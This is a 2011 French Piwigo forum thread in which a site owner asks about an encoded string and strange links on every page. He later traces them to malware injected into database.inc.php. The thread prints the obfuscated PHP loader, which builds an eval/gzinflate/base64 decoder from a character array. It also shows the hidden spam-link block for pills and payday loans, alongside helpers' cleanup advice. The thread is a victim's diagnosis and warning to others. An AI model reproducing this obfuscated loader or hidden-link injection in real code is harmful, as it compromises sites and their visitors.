Piwigo.org

fvuong · 2011-10-22 13:06:03

Bonjour,

J'ai un message qui apparait sur toutes les pages de Piwigo dans l'entete. Je ne sais pas pourquoi cette cle(?) apparait avant le tag <html>.

Je me demande si certaines pages ne sont pas affectées (voir le bas de pages vers des liens assez etranges pour des sites web).

Merci pour votre aide.

Fred

PS: J'ai fait la jour a la derniere version (2.3.0)

Voila le code source d'une des pages :

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');
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="fr" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="generator" content="Piwigo (aka PWG), see piwigo.org">

<meta name="description" content="Accueil">

<title>Accueil | Aurélie et Frédéric - Photos</title><link rel="shortcut icon" type="image/x-icon" href="themes/stripped/icon/favicon.ico">

<link rel="start" title="Accueil" href="http://vuong.fr/photos/" >
<link rel="search" title="Recherche" href="search.php" >

<link rel="stylesheet" type="text/css" href="local/combined/ugvmpk.css">




<script type="text/javascript">
// configuration options
var options = {
animatedMenu:true,

replaceActionIcons:true
}
</script>

<script type="text/javascript">
document.documentElement.className = 'js';
</script>

<script type="text/javascript" src="local/combined/qoqkvs.js"></script>



</head>

<body id="theCategoryPage">
<div id="the_page">

<div id="theHeader"><h1>
<span style="font-family:verdana,geneva,sans-serif;">Aurélie & Frédéric</span></h1>
<h3>
<span style="font-family:comic sans ms,cursive;">Les photos de la famille VUONG</span></h3>
</div>
<div class="titrePage">
<div class="browsePath">
<span id="menuswitcher" title="Afficher/cacher le menu">Menu</span><span class="arrow"> »</span>
<h2><a href="http://vuong.fr/photos/">Accueil</a></h2>
</div>
<div class="categoryActionsContainer">
<ul class="categoryActions group1">
</ul>
<ul class="categoryActions">
<li class="menuf">
<div>
<ul>
<li>
<a rel="nofollow" href="#" class="activeFlag">
<img class="flags" src="language/fr_FR/fr_FR.jpg" alt="Français [FR]" title="Français [FR]"/>
</a>

<ul class="flag-pan">
<li class="languageSwitchBoxTitle">Langue</li>

<li>
<a rel="nofollow" href="index.php?/categories&lang=de_DE">
<img class="flags" src="language/de_DE/de_DE.jpg" alt="Deutsch [DE]" title="Deutsch [DE]"/> Deutsch
</a>
</li>
<li>
<a rel="nofollow" href="index.php?/categories&lang=en_UK">
<img class="flags" src="language/en_UK/en_UK.jpg" alt="English [UK]" title="English [UK]"/> English
</a>
</li>
<li>
<a rel="nofollow" href="index.php?/categories&lang=es_ES">
<img class="flags" src="language/es_ES/es_ES.jpg" alt="Español [ES]" title="Español [ES]"/> Español
</a>
</li>
<li>
<a rel="nofollow" href="index.php?/categories&lang=fr_FR">
<img class="flags" src="language/fr_FR/fr_FR.jpg" alt="Français [FR]" title="Français [FR]"/> Français
</a>
</li>

</ul>

</li>
</ul>
</div>
</li>

</ul>
</div>
</div>
<div id="content" class="menuShown">
<div id="menubar">
<dl id="mbCategories">
<dt>
<a href="index.php?/categories">Albums</a>
</dt>
<dd>

<p class="totalImages">0 photo</p>
</dd>
</dl>
<dl id="mbIdentification">
<dt>Connexion rapide</dt>
<dd>
<form method="post" action="identification.php" id="quickconnect">
<div>
<label for="username">Nom d'utilisateur</label><br>
<input type="text" name="username" id="username" value="">
</div>
<p>
<div>
<label for="password">Mot de passe</label>
<input type="password" name="password" id="password" value="">
</div>

<p>
<div>
<label for="remember_me">Connexion auto
<input type="checkbox" name="remember_me" id="remember_me" value="1">
</label>
</div>
<p>
<p>
<div class="submit_block">
<input type="hidden" name="redirect" value="%2Fphotos%2F">
<input class="submit" type="submit" name="login" value="Valider">
<ul class="actions">
<li><a href="password.php" title="Mot de passe oublié ?" rel="nofollow">Mot de passe oublié ?</a></li>
</ul>
</div>

</form>
</dd>

</dl>
</div>

<div id="content_cell">
<div id="subcontent">
</div> 
</div>
<div style="clear: both;"></div>
</div> <div id="footer">
<div id="footer_left">

<a name="EoP"></a> 

<a href="identification.php" rel="nofollow">Connexion</a>

</div>

<div id="copyright">

   Propulsé par
   <a href="http://fr.piwigo.org" class="Piwigo">
   <span class="Piwigo">Piwigo</span></a>


</div>
</div>
</div>
<style>#asmg {position:absolute;overflow:auto;height:0;width:0;}</style><font id="asmg"><a href="http://buycipro24.com/">buy cipro</a>
<a href="http://glaucomaclinical.com/">glaucoma</a>
<a href="http://newyork-travel-guide.com/">newyork travel</a>
<a href="http://sciaticnervedamage.net/">sciatic nerve damage</a>
<a href="http://narrowangleglaucoma.info/">narrow angle glaucoma</a>
<a href="http://clusterheadache.info/">cluster headache</a>
<a href="http://www.buyziagenonline.com/">buy ziagen</a>
<a href="http://buyezetimibe.com/">ezetimibe</a>
<a href="http://rankexplorer.com">Poker Software</a>
<a href="http://fibromyalgia-pain-symptoms.com/">fibromyalgia</a>
<a href="http://fibromyalgiasyndrome.org/">fibromyalgia syndrome</a>
<a href="http://www.paydayloans250.com/">payday loans</a>
<a href="http://www.fastpaydayloan24.com/">payday loan</a>
<a href="http://relieve-headache-treatment.com/">headache</a>
<a href="http://relieve-sciatic-pain.com/">sciatica</a></font>
</body>
</html>

Gotcha · 2011-10-22 13:07:13

Bonjour,
Vous êtes victime d'un virus ou d'un piratage :-(

[Forum, topic 15686] Piratage de mon site web / cherche solution pour sécuriser

Gotcha · 2011-10-22 13:14:50

Ce n'est pas Piwigo qui est en cause mais votre ordi + client FTP. Utiisez-vous FileZilla ? Ce dernier est connu pour laisser passer des virus sur vos sites internet...

Donc il va falloir décontaminer votre ordinateur.
Changer vos mots de passes (TOUS ! pour plus de sécurité, serveur web compris !!)

Ensuite, il faudra s'occuper des fichiers infectés et là pas de mystère : suppression totale.
On peut renvoyer les fichiers d'origine de Piwigo sans soucis, seuls quelques fichiers (contenus dans le sous répertoire ./local/ seront à nettoyer manuellement, mais aussi d'autres fichiers que vous auriez créé/transférés...
Vérifiez aussi le contenu de votre fichier .htaccess qui peut se trouver être infecté aussi.

Frederic VUONG · 2011-10-24 16:47:23

Merci pour votre reponse.

J'ai refait l'install en copiant les fichiers depuis windows directement (sans Filezilla) mais cela n'a rien change.

J'ai finalement reussi a trouver d'ou venait le probleme! Du code a ete injecte dans mon fichier database.inc.php qui ajoutait la ligne d'erreur au debut ainsi que les liens en bas de page.

A voir le code ($wp_salt, $wp_add_filter....) j'ai l'impression que ce malware proviendrait d'un de mes sites wordpress. La question maintenant est comment ce code a ete injecte dans mon site (Piwigo et non Wordpress) et pourquoi Piwigo l'interprete-t-il ?

Je continue de creuser en attendant de trouver la solution.

Merci encore pour l'information.

Fred

ddtddt · 2011-10-24 16:55:35

je dirais
1/ désinstaller fillezilla
2/ aller dans program file supprimer le répertoire filezilla (cela supprimera les paramètre particulier mais également un éventuel vers dans le fichier de la liste des sites

3/ réinstaller filezilla

4/ re télécharger Piwigo

5/ renvoyer par FTP les fichiers

Frederic VUONG · 2011-10-24 17:30:30

Alors voila plus d'information: Il semblerait que cela soit un malware qui affecte TOUTES les pages php d'un site

Voila l'article:
http://www.marinbezhanov.com/web-develo … ell-v.1.0/

et l'outil pour nettoyer

http://www.php-beginners.com/solve-word … k-fix.html

Je vous conseille de verifier si vos pages ne contiennent pas le code suivant dans les entetes:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

Si c'est le cas vous allez passer une (quelques ?) bonne(s) soiree(s) !

Je continue de chercher comment le malware est arrive (je suspecte un plugin wordpress) et je vous tient au courant.

a++

Fred

Emmanuel · 2012-01-11 15:11:10

Bonjour, même problème que vous, mais je connais sa source; au tout départ, je cherchais un thème gratuit, je suis tombé sur le thème "Mr pixel" que j'ai installé, ensuite, j'ai reçu des spam en Anglais et là je viens de retirer les lignes du function.php et vais upgrader mon thème mystique et peut-être même wordpress, voir comment cela se comporte et changer mes mots de passe à terme.

J'ai installé un plugin antivirus pour wordpress, mais je ne sais pas s'il est efficace, car en beta 1.0!

Bonne soirée, Emmanuel.

Piwigo.org

Annonce

#1 2011-10-22 13:06:03

Message d'erreur sur toutes les pages

#2 2011-10-22 13:07:13

Re: Message d'erreur sur toutes les pages

#3 2011-10-22 13:14:50

Re: Message d'erreur sur toutes les pages

#4 2011-10-24 16:47:23

Re: Message d'erreur sur toutes les pages

#5 2011-10-24 16:55:35

Re: Message d'erreur sur toutes les pages

#6 2011-10-24 17:30:30

Re: Message d'erreur sur toutes les pages

#7 2012-01-11 15:11:10

Re: Message d'erreur sur toutes les pages

Pied de page des forums